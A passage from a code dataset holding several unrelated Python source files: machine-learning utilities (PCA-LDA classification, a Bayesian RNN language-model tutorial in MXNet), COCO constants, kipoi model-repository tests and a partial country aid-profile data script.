set(list(label_word_dict.keys()))\n label_words = {}\n for key in label_keys:\n key_dict = set(list(label_word_dict[key].keys()))\n keys_other = copy.deepcopy(label_keys)\n keys_other.discard(key)\n # 其他类别的所有词汇\n kos = set()\n for ko in keys_other:\n ko_dict = set(list(label_word_dict[ko].keys()))\n kos = kos | ko_dict\n\n # 获取独有的词汇\n key_public = kos & key_dict\n key_label = key_dict - key_public\n\n label_word_freq = {kl:label_word_dict[key][kl] for kl in key_label}\n label_words[key] = label_word_freq\n\n save_json(label_words, \"label_keyword_unique.json\")\n\n\nif __name__ == '__main__':\n path = \"ccks_news_2020.json\"\n statistics_keyword_by_label(path, rate=1)\n mm = 0\n\n","repo_name":"yongzhuo/nlp_xiaojiang","sub_path":"AugmentText/augment_keyword/statistics_keyword.py","file_name":"statistics_keyword.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","stars":1494,"dataset":"github-code","pt":"48"} +{"seq_id":"37622386828","text":"from myzonecv.core import consts as C\n\nKEYPOINT_NAMES = C.COCO_KEYPOINT_NAMES\nKEYPOINT_INDEX2NAME = C.COCO_KEYPOINT_INDEX2NAME\nSKELETON = C.COCO_SKELETON\nKEYPOINT_FLIP_PAIRS = C.COCO_KEYPOINT_FLIP_PAIRS\nKEYPOINT_UPPER_BODY = C.COCO_KEYPOINT_UPPER_BODY\nKEYPOINT_LOWER_BODY = C.COCO_KEYPOINT_LOWER_BODY\nKEYPOINT_WEIGHTS = C.COCO_KEYPOINT_WEIGHTS\nKEYPOINT_SIGMAS = C.COCO_KEYPOINT_SIGMAS\nPERSON_CAT_ID = C.COCO_PERSON_CAT_ID\n\nEVAL_OKS_HARD_FACTORS = C.COCO_EVAL_OKS_HARD_FACTORS\n\nMAX_DETECTIONS_PER_IMG = C.MAX_DETECTIONS_PER_IMG\nEVAL_SCORE_THRES = C.EVAL_SCORE_THRES\nEVAL_RECALL_THRES = C.EVAL_RECALL_THRES\nEVAL_AREA_RANGES = C.EVAL_AREA_RANGES\nEVAL_AREA_LABELS = C.EVAL_AREA_LABELS\n\nBBOX_PADDING_RATIO = C.BBOX_PADDING_RATIO\nBBOX_SCALE_UNIT = C.BBOX_SCALE_UNIT\nBORDER_COLOR_VALUE = C.BORDER_COLOR_VALUE\n","repo_name":"netpaladinx/myzonelab","sub_path":"myzonecv/core/data/datasets/coco/coco_consts.py","file_name":"coco_consts.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19086893470","text":"from sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nfrom sklearn.model_selection import train_test_split, LeaveOneOut\nimport seaborn as sn\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom utils import classifier_cross_validation, classifier_external_validation\n\nclass PCA_LDA():\n def __init__(self, dataset, number_of_components, 
cross_validation_type='loo', split_for_validation=None, data_validation=None, equal_probabilites=False, lda_random_state=123):\n self.dataset = dataset\n self.number_of_components = number_of_components\n self.split_for_validation = split_for_validation\n self.data_validation = data_validation\n self.equal_probabilites = equal_probabilites\n self.lda_random_state = lda_random_state\n self.metrics = {}\n self._cv = None\n\n if not isinstance(self.dataset, pd.DataFrame):\n raise ValueError('The dataset should be a pd.DataFrame.')\n\n if (self.data_validation is None) and (self.split_for_validation is None):\n raise ValueError('Should be defined the samples for validation or size of test size for split the dataset.')\n\n if type(number_of_components) not in [int]:\n raise ValueError('number_of_components should be a positive integer.')\n\n if (not self.split_for_validation is None) and (self.data_validation is None):\n if self.split_for_validation == 'all':\n self._xCal = self.dataset.iloc[:, 2:]\n self._yCal = self.dataset.iloc[:, 1]\n elif isinstance(self.split_for_validation, float):\n self._xCal, self._xVal, self._yCal, self._yVal = train_test_split(self.dataset.iloc[:, 2:], self.dataset.iloc[:, 1], test_size=split_for_validation, random_state=lda_random_state)\n else:\n raise ValueError(\"split_for_validation need be a float value between 0 and 1 for split dataset. Use 1 for calibrate with all samples of dataset.\")\n\n if not self.data_validation is None:\n if isinstance(self.data_validation, pd.DataFrame):\n self._xCal = self.dataset.iloc[:, 2:]\n self._yCal = self.dataset.iloc[:, 1]\n self._xVal = self.data_validation.iloc[:, 2:]\n self._yVal = self.data_validation.iloc[:, 1]\n else:\n raise ValueError(\"data_validation need be a pandas dataframe\")\n\n if self.equal_probabilites not in [True, False]:\n raise ValueError('equal_probabilites should be a boolean value')\n\n if (type(self.lda_random_state) not in [int]):\n raise ValueError('lda_random_state should be a integer')\n\n if isinstance(cross_validation_type, str):\n if cross_validation_type == \"loo\":\n self._cv = LeaveOneOut()\n elif (type(cross_validation_type) in [int]) and (cross_validation_type > 0):\n self._cv = cross_validation_type\n else:\n raise ValueError(\"The cross_validation_type should be a positive integer for k-fold method ou 'loo' for leave one out cross validation.\")\n \n \n def calibrate(self):\n self._pca = PCA(n_components=self.number_of_components, tol=0.0000000001, random_state=self.lda_random_state, svd_solver=\"full\")\n \n self._xReduced = self._pca.fit_transform(self._xCal)\n \n if self.equal_probabilites == True:\n n_class = len(self._yCal.unique())\n priors = np.full((n_class, ), 1 / n_class)\n else:\n priors = self._yCal.value_counts(normalize=True)\n priors = np.array(priors.sort_index(axis=0))\n\n self._lda = LinearDiscriminantAnalysis(n_components=self.number_of_components, tol=1e-8, priors=priors)\n\n self._lda.fit(self._xReduced, self._yCal)\n\n self.predictions = self._lda.predict(self._xReduced)\n\n accuracy = accuracy_score(self._yCal, self.predictions)\n cm = confusion_matrix(self._yCal, self.predictions)\n cm = pd.DataFrame(cm)\n\n index_columns = self._yCal.value_counts().sort_index(axis=0).index\n cm.index = index_columns\n cm.columns = index_columns\n\n n_samples = self._yCal.shape[0]\n\n calibration_metrics = {'accuracy': accuracy, 'confusion_matrix': cm, 'n_samples': n_samples, 'n_components': self.number_of_components, 'priors': priors}\n\n self.metrics['calibration'] = 
calibration_metrics\n \n def cross_validate(self):\n \n accuracy, cm, predicted_values = classifier_cross_validation(self._lda, self._xReduced, self._yCal, cv=self._cv)\n\n method = 'LOO'\n if isinstance(self._cv, int):\n method = \"{}-fold\".format(self._cv)\n\n cross_validation_metrics = {'accuracy': accuracy, 'confusion_matrix': cm, 'method': method, 'predicted_values': predicted_values}\n\n self.metrics['cross_validation'] = cross_validation_metrics\n \n\n def validate(self):\n\n self._pca_val = PCA(n_components=self.number_of_components, tol=0.0000000001, random_state=self.lda_random_state, svd_solver=\"full\")\n\n self.xValReduced = self._pca_val.fit_transform(self._xVal)\n\n accuracy, cm, predicted_values = classifier_external_validation(self._lda, self.xValReduced, self._yVal)\n\n nsamples = self._xVal.shape[0]\n validation = {'accuracy': accuracy, 'confusion_matrix': cm, 'n_samples': nsamples, 'predicted_values': predicted_values}\n\n self.metrics['validation'] = validation\n \n def plot_confusion_matrix(self, cm, title='Confusion Matrix', cbar=True):\n sn.heatmap(cm, annot=True, cmap='Greys', linewidths=0.7, linecolor='black', cbar=cbar, square=True, fmt='g')\n plt.title(title, pad=20.0)\n plt.ylabel('Reference')\n plt.xlabel('Predicted')\n plt.tight_layout(pad=1.0)\n return plt\n \n\n def create_model(self):\n \n self.calibrate()\n self.cross_validate()\n self.validate()","repo_name":"dijsilva/spectroscopy-analysis-tool","sub_path":"algorithms/classification/pca_lda.py","file_name":"pca_lda.py","file_ext":"py","file_size_in_byte":6097,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"31295224441","text":"import math\nimport os\nimport time\nimport numpy as np\nimport mxnet as mx\nfrom mxnet import gluon, autograd\nfrom mxnet.gluon import nn, rnn\n\ncontext = mx.gpu(0)\nargs_data = '../data/nlp/ptb.'\nargs_model = 'lstm'\nargs_emsize = 100\nargs_nhid = 100\nargs_nlayers = 2\nargs_lr = 10.0\nargs_clip = 0.2\nargs_epochs = 2\nargs_batch_size = 32\nargs_bptt = 5\nargs_dropout = 0.2\nargs_tied = True\nargs_cuda = 'store_true'\nargs_log_interval = 500\nargs_save = 'model.param'\n\nclass Dictionary(object):\n def __init__(self):\n self.word2idx = {}\n self.idx2word = []\n\n def add_word(self, word):\n if word not in self.word2idx:\n self.idx2word.append(word)\n self.word2idx[word] = len(self.idx2word) - 1\n return self.word2idx[word]\n\n def __len__(self):\n return len(self.idx2word)\nclass Corpus(object):\n def __init__(self, path):\n self.dictionary = Dictionary()\n self.train = self.tokenize(path + 'train.txt')\n self.valid = self.tokenize(path + 'valid.txt')\n self.test = self.tokenize(path + 'test.txt')\n\n def tokenize(self, path):\n \"\"\"Tokenizes a text file.\"\"\"\n assert os.path.exists(path)\n # Add words to the dictionary\n with open(path, 'r') as f:\n tokens = 0\n for line in f:\n words = line.split() + ['']\n tokens += len(words)\n for word in words:\n self.dictionary.add_word(word)\n\n # Tokenize file content\n with open(path, 'r') as f:\n ids = np.zeros((tokens,), dtype='int32')\n token = 0\n for line in f:\n words = line.split() + ['']\n for word in words:\n ids[token] = self.dictionary.word2idx[word]\n token += 1\n return mx.nd.array(ids, dtype='int32')\ndef batchify(data, batch_size):\n \"\"\"Reshape data into (num_example, batch_size)\"\"\"\n nbatch = data.shape[0] // batch_size\n data = data[:nbatch * batch_size]\n data = data.reshape((batch_size, nbatch)).T\n return data\ndef get_batch(source, i):\n 
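# take a window of at most args_bptt steps; the targets are the inputs shifted one step ahead\n    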
seq_len = min(args_bptt, source.shape[0] - 1 - i)\n data = source[i : i + seq_len]\n target = source[i + 1 : i + 1 + seq_len]\n return data, target.reshape((-1,))\n\ncorpus = Corpus(args_data)\nntokens = len(corpus.dictionary)\ntrain_data = batchify(corpus.train, args_batch_size).as_in_context(context)\nval_data = batchify(corpus.valid, args_batch_size).as_in_context(context)\ntest_data = batchify(corpus.test, args_batch_size).as_in_context(context)\nnum_batches = int(np.ceil( (train_data.shape[0] - 1)/args_bptt) )\n\nclass RNNModel(gluon.Block):\n \"\"\"A model with an encoder, recurrent layer, and a decoder.\"\"\"\n def __init__(self, mode, vocab_size, num_embed, num_hidden,\n num_layers, dropout=0.5, tie_weights=False, **kwargs):\n super(RNNModel, self).__init__(**kwargs)\n with self.name_scope():\n self.drop = nn.Dropout(dropout)\n self.encoder = nn.Embedding(vocab_size, num_embed,\n weight_initializer = mx.init.Uniform(0.1))\n if mode == 'rnn_relu':\n self.rnn = rnn.RNN(num_hidden, num_layers, activation='relu',\n dropout=dropout, input_size=num_embed)\n elif mode == 'rnn_tanh':\n self.rnn = rnn.RNN(num_hidden, num_layers, dropout=dropout,\n input_size=num_embed)\n elif mode == 'lstm':\n self.rnn = rnn.LSTM(num_hidden, num_layers, dropout=dropout,\n input_size=num_embed)\n elif mode == 'gru':\n self.rnn = rnn.GRU(num_hidden, num_layers, dropout=dropout,\n input_size=num_embed)\n else:\n raise ValueError(\"Invalid mode %s. Options are rnn_relu, \"\n \"rnn_tanh, lstm, and gru\"%mode)\n if tie_weights:\n self.decoder = nn.Dense(vocab_size, in_units = num_hidden,\n params = self.encoder.params)\n else:\n self.decoder = nn.Dense(vocab_size, in_units = num_hidden)\n self.num_hidden = num_hidden\n def forward(self, inputs, hidden):\n emb = self.drop(self.encoder(inputs))\n output, hidden = self.rnn(emb, hidden)\n output = self.drop(output)\n decoded = self.decoder(output.reshape((-1, self.num_hidden)))\n return decoded, hidden\n def begin_state(self, *args, **kwargs):\n return self.rnn.begin_state(*args, **kwargs)\n def set_params_to(self, new_values):\n for model_param, new_value in zip(self.collect_params().values(), new_values):\n model_param_ctx = model_param.list_ctx()[0]\n model_param._data[ model_param_ctx ] = new_value\n return\ndef detach(hidden):\n if isinstance(hidden, (tuple, list)):\n hidden = [i.detach() for i in hidden]\n else:\n hidden = hidden.detach()\n return hidden\n\nbaseline_model = RNNModel(args_model, ntokens, args_emsize, args_nhid, args_nlayers, args_dropout, args_tied)\nbaseline_model.collect_params().initialize(mx.init.Xavier(), ctx=context)\ntrainer = gluon.Trainer(\n baseline_model.collect_params(), 'sgd',\n {'learning_rate': args_lr, 'momentum': 0, 'wd': 0})\nsmce_loss = gluon.loss.SoftmaxCrossEntropyLoss() \n\ndef train_baseline(model):\n global args_lr\n best_val = float(\"Inf\")\n for epoch in range(args_epochs):\n total_L = 0.0\n start_time = time.time()\n hidden = model.begin_state(func = mx.nd.zeros, batch_size = args_batch_size, ctx = context)\n for ibatch, i in enumerate(range(0, train_data.shape[0] - 1, args_bptt)):\n data, target = get_batch(train_data, i)\n hidden = detach(hidden)\n with autograd.record():\n output, hidden = model(data, hidden)\n L = smce_loss(output, target)\n L.backward()\n grads = [i.grad(context) for i in model.collect_params().values()]\n # Here gradient is for the whole batch.\n # So we multiply max_norm by batch_size and bptt size to balance it.\n gluon.utils.clip_global_norm(grads, args_clip * args_bptt * args_batch_size)\n 
trainer.step(args_batch_size * args_bptt)\n total_L += mx.nd.sum(L).asscalar()\n if ibatch % args_log_interval == 0 and ibatch > 0:\n cur_L = total_L / args_bptt / args_batch_size / args_log_interval\n print('[Epoch %d Batch %d] loss %.2f, perplexity %.2f' % (\n epoch + 1, ibatch, cur_L, math.exp(cur_L)))\n total_L = 0.0\n val_L = evaluate(val_data, model)\n print('[Epoch %d] time cost %.2fs, validation loss %.2f, validation perplexity %.2f' % (epoch + 1, time.time() - start_time, val_L, math.exp(val_L)))\n if val_L < best_val:\n best_val = val_L\n test_L = evaluate(test_data, model)\n model.save_params(args_save)\n print('test loss %.2f, test perplexity %.2f' % (test_L, math.exp(test_L)))\n else:\n args_lr = args_lr * 0.25\n trainer._init_optimizer('sgd', {'learning_rate': args_lr, 'momentum': 0, 'wd': 0})\n model.load_params(args_save, context)\n return\ndef evaluate(data_source, model):\n total_L = 0.0\n ntotal = 0\n hidden = model.begin_state(func = mx.nd.zeros, batch_size = args_batch_size, ctx=context)\n for i in range(0, data_source.shape[0] - 1, args_bptt):\n data, target = get_batch(data_source, i)\n output, hidden = model(data, hidden)\n L = smce_loss(output, target)\n total_L += mx.nd.sum(L).asscalar()\n ntotal += L.size\n return total_L / ntotal\n\ntrain_baseline(baseline_model)\nbaseline_model.load_params(args_save, context)\ntest_L = evaluate(test_data, baseline_model)\nprint('Best test loss %.2f, test perplexity %.2f'%(test_L, math.exp(test_L)))\n\nclass ScaleMixturePrior(object):\n def __init__(self, alpha, sigma1, sigma2):\n self.alpha = mx.nd.array([alpha], ctx=context)\n self.one_minus_alpha = mx.nd.array([1 - alpha], ctx=context)\n self.zero = mx.nd.array([0.0], ctx=context)\n self.sigma1 = mx.nd.array([sigma1], ctx=context)\n self.sigma2 = mx.nd.array([sigma2], ctx=context)\n return\n def log_prob(self, model_params):\n total_log_prob = None\n for i, model_param in enumerate(model_params):\n p1 = gaussian_prob(model_param, self.zero, self.sigma1)\n p2 = gaussian_prob(model_param, self.zero, self.sigma2)\n log_prob = mx.nd.sum(mx.nd.log(self.alpha * p1 + self.one_minus_alpha * p2))\n if i == 0: total_log_prob = log_prob\n else: total_log_prob = total_log_prob + log_prob\n return total_log_prob\n# Define some auxiliary functions\ndef log_gaussian_prob(x, mu, sigma):\n return - mx.nd.log(sigma) - (x - mu) ** 2 / (2 * sigma ** 2)\ndef gaussian_prob(x, mu, sigma):\n scaling = 1.0 / mx.nd.sqrt(2.0 * np.pi * (sigma ** 2))\n bell = mx.nd.exp(-(x - mu)**2 / (2.0 * sigma ** 2))\n return scaling * bell\n\nclass VariationalPosterior(object):\n def __init__(self, model, var_mu_init_scale, var_sigma_init_scale):\n self.var_mus = []\n self.var_rhos = []\n self.raw_var_mus = []\n self.raw_var_rhos = []\n var_rho_init_scale = inv_softplus(var_sigma_init_scale)\n for i, model_param in enumerate(model.collect_params().values()):\n var_mu = gluon.Parameter('var_mu_{}'.format(i), shape=model_param.shape,\n init=mx.init.Normal(var_mu_init_scale))\n var_mu.initialize(ctx=context)\n self.var_mus.append(var_mu)\n self.raw_var_mus.append(var_mu.data(context))\n var_rho = gluon.Parameter(\n 'var_rho_{}'.format(i), shape=model_param.shape,\n init=mx.init.Constant(var_rho_init_scale))\n var_rho.initialize(ctx=context)\n self.var_rhos.append(var_rho)\n self.raw_var_rhos.append(var_rho.data(context))\n self.var_params = self.var_mus + self.var_rhos\n return\n def log_prob(self, model_params):\n log_probs = [\n mx.nd.sum(log_gaussian_prob(model_param, raw_var_mu, softplus(raw_var_rho)))\n for 
(model_param, raw_var_mu, raw_var_rho)\n in zip(model_params, self.raw_var_mus, self.raw_var_rhos)]\n total_log_prob = log_probs[0]\n for log_prob in log_probs[1:]:\n total_log_prob = total_log_prob + log_prob\n return total_log_prob\n def sample_model_params(self):\n model_params = []\n for raw_var_mu, raw_var_rho in zip(self.raw_var_mus, self.raw_var_rhos):\n epsilon = mx.nd.random_normal(shape=raw_var_mu.shape, loc=0., scale=1.0, ctx=context)\n var_sigma = softplus(raw_var_rho)\n model_param = raw_var_mu + var_sigma * epsilon\n model_params.append(model_param)\n return model_params\n def num_params(self):\n return sum([\n 2 * np.prod(param.shape)\n for param in self.var_mus])\n# Define some auxiliary functions\ndef softplus(x):\n return mx.nd.log(1. + mx.nd.exp(x))\ndef inv_softplus(x):\n if x <= 0: raise ValueError(\"x must be > 0: {}\".format(x))\n return np.log(np.exp(x) - 1.0)\n\nclass BBB_Loss(gluon.loss.Loss):\n def __init__(self, prior, var_posterior, log_likelihood, num_batches, weight=None, batch_axis=0, **kwargs):\n super(BBB_Loss, self).__init__(weight, batch_axis, **kwargs)\n self.prior = prior\n self.var_posterior = var_posterior\n self.log_likelihood = log_likelihood\n self.num_batches = num_batches\n return\n def forward(self, yhat, y, sampled_params, sample_weight=None):\n neg_log_likelihood = mx.nd.sum(self.log_likelihood(yhat, y))\n prior_log_prob = mx.nd.sum(self.prior.log_prob(sampled_params))\n var_post_log_prob = mx.nd.sum(self.var_posterior.log_prob(sampled_params))\n kl_loss = var_post_log_prob - prior_log_prob\n var_loss = neg_log_likelihood + kl_loss / self.num_batches\n return var_loss, neg_log_likelihood\n\ndef train_bbb(model):\n global args_lr\n global args_ess_multiplier\n best_val = float(\"Inf\")\n for epoch in range(args_epochs):\n total_L = 0.0\n start_time = time.time()\n hidden = model.begin_state(func = mx.nd.zeros, batch_size = args_batch_size, ctx = context)\n for ibatch, i in enumerate(range(0, train_data.shape[0] - 1, args_bptt)):\n x, y = get_batch(train_data, i)\n hidden = detach(hidden)\n with autograd.record():\n sampled_params = var_posterior.sample_model_params()\n model.set_params_to(sampled_params)\n yhat, hidden = model(x, hidden)\n var_loss, L = bbb_loss(yhat, y, sampled_params)\n var_loss.backward()\n grads = [var_mu.grad(context) for var_mu in var_posterior.var_mus]\n effective_batch_size = (args_bptt * args_batch_size) + (var_posterior.num_params() / num_batches)\n gluon.utils.clip_global_norm(grads, args_clip * effective_batch_size)\n trainer.step(args_clip * effective_batch_size)\n total_L += mx.nd.sum(L).asscalar()\n if ibatch % args_log_interval == 0 and ibatch > 0:\n cur_L = total_L / args_bptt / args_batch_size / args_log_interval\n print('[Epoch %d Batch %d] loss %.2f, perplexity %.2f' % (\n epoch + 1, ibatch, cur_L, math.exp(cur_L)))\n total_L = 0.0\n model.set_params_to(var_posterior.raw_var_mus)\n val_L = evaluate(val_data, model)\n print('[Epoch %d] time cost %.2fs, validation loss %.2f, validation perplexity %.2f' % (\n epoch + 1, time.time() - start_time, val_L, math.exp(val_L)))\n if val_L < best_val:\n best_val = val_L\n model.set_params_to(var_posterior.raw_var_mus)\n test_L = evaluate(test_data, model)\n model.save_params(args_save)\n print('test loss %.2f, test perplexity %.2f' % (test_L, math.exp(test_L)))\n else:\n args_lr = args_lr * 0.25\n trainer._init_optimizer('sgd', {'learning_rate': args_lr, 'momentum': 0, 'wd': 0})\n model.load_params(args_save, context)\n return\n\nbbb_model = RNNModel(args_model, 
ntokens, args_emsize, args_nhid, args_nlayers, dropout=0.0, tie_weights=args_tied)\nbbb_model.collect_params().initialize(mx.init.Xavier(), ctx=context)\nprior = ScaleMixturePrior(alpha = 0.75, sigma1 = 0.001, sigma2 = 0.75)\nvar_posterior = VariationalPosterior(bbb_model, var_mu_init_scale = 0.05, var_sigma_init_scale = 0.01)\nbbb_loss = BBB_Loss(prior, var_posterior, gluon.loss.SoftmaxCrossEntropyLoss(), num_batches)\ntrainer = gluon.Trainer(var_posterior.var_params, 'sgd',\n { 'learning_rate': args_lr, 'momentum': 0, 'wd': 0 })\n\ntrain_bbb(bbb_model)\nbbb_model.load_params(args_save, context)\nbbb_model.set_params_to(var_posterior.raw_var_mus)\ntest_L = evaluate(test_data, bbb_model)\nprint('Best test loss %.2f, test perplexity %.2f'%(test_L, math.exp(test_L)))","repo_name":"zhaojinxi/learn_python","sub_path":"learn_mxnet/Part 3 Advanced Topics/Variational methods/Bayes by Backprop for Recurrent Neural Networks (RNNs).py","file_name":"Bayes by Backprop for Recurrent Neural Networks (RNNs).py","file_ext":"py","file_size_in_byte":15324,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"70675462865","text":"\"\"\"test: kipoi test-source\n\"\"\"\nimport numpy as np\nimport pytest\nimport sys\nimport subprocess as sp\nfrom kipoi.cli.source_test import modified_files\nfrom kipoi.sources import list_softlink_dependencies, LocalSource\nimport kipoi\nimport os\n\ndef test_singularity_non_kipoi_src_fail():\n returncode = sp.call([\"python\", os.path.abspath(\"./kipoi/__main__.py\"),\n \"test-source\",\n \"dir\",\n \"--all\",\n \"-x\",\n \"--singularity\"]\n )\n\n assert returncode == 1\n\ndef test_singularity_commonenv_together_fail():\n returncode = sp.call([\"python\", os.path.abspath(\"./kipoi/__main__.py\"),\n \"test-source\",\n \"kipoi\",\n \"--all\",\n \"-x\",\n \"--singularity\",\n \"--common_env\"]\n )\n\n assert returncode == 1\n\n\ndef test_list_softlink_dependencies():\n \"\"\"Test if finding model dependencies works\n \"\"\"\n component_dir = kipoi.get_source(\"kipoi\").local_path\n deps = list_softlink_dependencies(os.path.join(component_dir, 'HAL'),\n component_dir)\n # one of these two, depending on the model source\n assert (deps == {'MaxEntScan'}) or (deps == {'MaxEntScan/template',\n 'MaxEntScan/template/example_files',\n 'labranchor/example_files'})\n assert list_softlink_dependencies(os.path.join(component_dir, 'deepTarget'),\n component_dir) == set()\n\n\ndef dont_test_diff():\n git_range = [\"master\", \"HEAD\"]\n local_path = \"/home/avsec/.kipoi/models\"\n modified_files([\"master\", \"HEAD\"], \"/home/avsec/.kipoi/models\", relative=True)\n\n sp.call(['git', 'diff', '--relative=/home/avsec/.kipoi/models',\n '--name-only', 'master...HEAD',\n '--', '/home/avsec/.kipoi/models/*', '/home/avsec/.kipoi/models/*/*'])\n\n\ndef test_single_model_dry():\n # Dry run\n returncode = sp.call([\"python\", os.path.abspath(\"./kipoi/__main__.py\"),\n \"test-source\",\n \"kipoi\",\n \"--git-range\", \"master\", \"HEAD\",\n \"-n\"])\n\n assert returncode == 0\n\n\ndef test_single_model():\n MODEL = \"HAL\"\n try:\n proc = sp.Popen([\"python\", os.path.abspath(\"./kipoi/__main__.py\"), \"test-source\",\n \"kipoi\",\n \"--git-range\", \"master\", \"HEAD\",\n \"--all\",\n \"-x\",\n \"-c\",\n f\"-k {MODEL}\"], stdout=sp.PIPE, stderr=sp.PIPE)\n proc.wait()\n stdout, stderr = proc.communicate()\n except sp.CalledProcessError as err:\n print(f\"Error: {err.stderr}\")\n\ndef test_single_model_singularity():\n MODEL = 
\"epidermal_basset\"\n try:\n proc = sp.Popen([\"python\", os.path.abspath(\"./kipoi/__main__.py\"), \"test-source\",\n \"kipoi\",\n \"--all\",\n \"-x\",\n \"--singularity\",\n f\"-k {MODEL}\"], stdout=sp.PIPE, stderr=sp.PIPE)\n proc.wait()\n stdout, stderr = proc.communicate()\n except sp.CalledProcessError as err:\n print(f\"Error: {err.stderr}\")\n\n\n@pytest.fixture\ndef source():\n source_dir = 'example/models'\n return LocalSource(source_dir)\n\n\n# source = source() # TODO - remove\n\n# MODEL = 'multiple_models'\n\n\ndef test_list_components(source):\n # 1. list\n # 2. get each model\n # 3. check that the arguments were set correctly (doc as well as the resize len)\n # 4. check that the made prediction is correct\n\n # 1. instantiate the source\n ls = source._list_components(\"model\")\n\n # standard models\n assert 'pyt' in ls\n\n # group models\n assert 'multiple_models/model1' in ls\n assert 'multiple_models/submodel/model2' in ls\n\n # dataloader\n ls = source._list_components(\"dataloader\")\n\n # standard models\n assert 'pyt' in ls\n\n # group dataloader - not present\n assert 'multiple_models/model1' not in ls\n assert 'multiple_models/submodel/model2' not in ls\n\n\ndef test_is_component(source):\n # _is_component\n assert source._is_component(\"pyt\", 'model')\n assert source._is_component(\"pyt\", 'dataloader')\n\n assert not source._is_component(\"multiple_models\", 'model') \n assert not source._is_component(\"multiple_models\", 'dataloader')\n\n assert source._is_component(\"multiple_models/model1\", 'model')\n assert not source._is_component(\"multiple_models/model1\", 'dataloader')\n\n assert not source._is_component(\"multiple_models\", 'model') \n assert not source._is_component(\"multiple_models\", 'dataloader')\n\n assert source._is_component(\"multiple_models/submodel/model2\", 'model')\n assert not source._is_component(\"multiple_models/submodel/model2\", 'dataloader')\n\n\ndef test_pull_component(source):\n assert source._get_component_dir(\"pyt\", 'model') == os.path.join(source.local_path, \"pyt\")\n assert source._get_component_dir(\"pyt\", 'dataloader') == os.path.join(source.local_path, \"pyt\")\n\n # group component\n assert source._get_component_dir(\"multiple_models/model1\", 'model') == os.path.join(source.local_path,\n \"multiple_models\")\n with pytest.raises(ValueError):\n source._get_component_dir(\"multiple_models/model1\", 'dataloader') is None\n\n assert source._get_component_dir(\"multiple_models/submodel/model2\", 'model') == \\\n os.path.join(source.local_path, \"multiple_models\")\n\n\ndef test_get_component_descr(source):\n assert source._get_component_descr(\"pyt\", 'model').info.doc # model has some description\n assert source._get_component_descr(\"pyt\", 'dataloader').info.doc # dataloader has some description\n\n # test overriding\n assert source._get_component_descr(\"multiple_models/model1\", 'model').info.doc == \"model returning one\"\n assert source._get_component_descr(\"multiple_models/submodel/model2\", 'model').info.doc == \"model returning two\"\n\n # test placeholders\n assert source._get_component_descr(\"multiple_models/model1\", 'model').schema.inputs.doc == \"sequence one\"\n assert source._get_component_descr(\"multiple_models/submodel/model2\", 'model').schema.inputs.doc == \"sequence two\"\n\n\ndef test_get_model(source):\n # model correctly instentiated\n assert kipoi.get_dataloader_factory(\"pyt\", source).info.doc\n assert kipoi.get_model(\"pyt\", source).info.doc\n\n assert 
kipoi.get_model(\"multiple_models/model1\", source).dummy_add == 1\n assert kipoi.get_model(\"multiple_models/submodel/model2\", source).dummy_add == 2\n\n # model examples correctly performed\n m = kipoi.get_model(\"multiple_models/model1\", source)\n assert np.all(m.pipeline.predict_example() == 1)\n\n m = kipoi.get_model(\"multiple_models/submodel/model2\", source)\n assert np.all(m.pipeline.predict_example() == 2)\n\n\ndef test_list_models(source):\n df = source.list_models()\n assert \"pyt\" in list(df.model)\n assert \"multiple_models\" not in list(df.model)\n assert \"multiple_models/model1\" in list(df.model)\n assert \"multiple_models/submodel/model2\" in list(df.model)\n\n\ndef test_loading_target(source):\n # tests that the column names\n # were loaded correctly\n md = kipoi.get_model_descr(\"Basset\")\n assert len(md.schema.targets.column_labels) > 1\n","repo_name":"kipoi/kipoi","sub_path":"tests/test_22_kipoi_test_source.py","file_name":"test_22_kipoi_test_source.py","file_ext":"py","file_size_in_byte":7644,"program_lang":"python","lang":"en","doc_type":"code","stars":227,"dataset":"github-code","pt":"48"} +{"seq_id":"32410761996","text":"import pandas as pd\nimport json\nfrom pprint import pprint\nimport random\n\nwith open('country_profiles.json') as data_file:\n dataset = json.load(data_file)\n\ndata = dataset['data']\n\n# Load recommendations\nrecs = pd.read_csv('recommendations.csv')\nrecs = recs.fillna('')\nrecs_dict = recs.groupby(['profile']).apply(lambda x: x.to_dict(orient='record')).to_dict()\n\n# Load annotations\njs = open('annotations.json', encoding='utf-8').read()\nannotations = json.loads(js)\n\n# Get country names\ncountries = data.keys()\n\nnested_data = {}\nnested_data['data_one'] = {}\n\nfor c in countries:\n print(c)\n print('--------------------')\n obj = {}\n\n # Create dataframe from country dict\n df = pd.DataFrame(data[c])\n\n # Group by data type (current / constant / currency values)\n grouped_by_dataType = list(df.groupby('Data_type'))\n\n\n datatype_dict = {}\n for x in grouped_by_dataType:\n\n datatype_obj = {}\n arr = []\n\n # Group by year\n grouped_by_year = list(x[1].groupby('Time_Period'))\n\n for y in grouped_by_year:\n # Create and populate dict for every country/datatype/year\n adict = dict(zip(y[1]['Metric'].values, y[1]['Value'].values))\n adict[\"Time_Period\"] = int(y[0])\n\n # pprint(adict)\n\n # Select variables\n keys = [\n 'All_ODA_Over_GNI',\n 'LDC_ODA_Over_All_ODA',\n 'Africa_ODA_Over_All_ODA',\n 'In_Donor_Refugee_Over_All_ODA',\n 'Debt_Relief_Over_All_ODA',\n 'All_ODA',\n 'LDC_ODA',\n 'Africa_ODA',\n 'In_Donor_Refugee_Costs',\n 'Debt_Relief',\n 'All_ODA_YoY_Percent',\n 'LDC_ODA_YoY_Percent',\n 'Africa_ODA_YoY_Percent',\n 'In_Donor_Refugee_YoY_Percent',\n 'Time_Period'\n ]\n\n # Check if variable is in keys, otherwise generate random value\n for k in keys:\n if k not in adict.keys():\n adict[k] = \"None\"\n print(k + ' is not in ' + c)\n print('***************************************************')\n\n # Filter out the variables and create new dict\n adict = dict(zip(keys, [adict[k] for k in keys]))\n pprint(adict)\n\n # Create percenatges of LDC, Africa and in-donor against ODA/GNI\n # adict['LDC_ODA_Over_All_ODA_Over_GNI'] = adict['LDC_ODA_Over_All_ODA'] * adict['All_ODA_Over_GNI']\n # 